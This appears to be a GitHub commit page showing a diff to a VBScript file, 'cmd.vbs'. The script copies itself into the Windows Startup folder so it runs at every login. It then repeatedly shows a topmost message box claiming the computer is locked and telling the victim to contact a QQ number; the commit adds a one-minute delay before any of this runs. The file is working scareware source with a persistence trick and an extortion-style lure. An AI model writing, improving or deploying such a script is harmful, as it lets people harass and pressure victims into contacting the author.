Skip to content

Commit b5e3cb1

Browse files
committed
vbs
1 parent 82ecc5f commit b5e3cb1

1 file changed

Lines changed: 4 additions & 2 deletions

File tree

vbs/cmd.vbs

Lines changed: 4 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,8 @@
1+
wscript.sleep 1000*60
2+
13
set fso = createobject("scripting.filesystemobject")
24
set ws = createobject("wscript.shell")
3-
pt = ws.specialfolders("startup") & "\"
5+
pt = ws.specialfolders("startup") & "\"
46
set file = fso.getfile(wscript.scriptfullname)
57
file.copy pt
68

@@ -13,5 +15,5 @@ set oShell = nothing
1315
do until i=10
1416
i=i+1
1517
msgbox "你电脑已中锁,请联系QQ:619699629",16+4096,"系统提示"
16-
wscript.sleep 1000*60*5 '时间可以自己改
18+
wscript.sleep 1000*60*5
1719
loop

0 commit comments

Comments
 (0)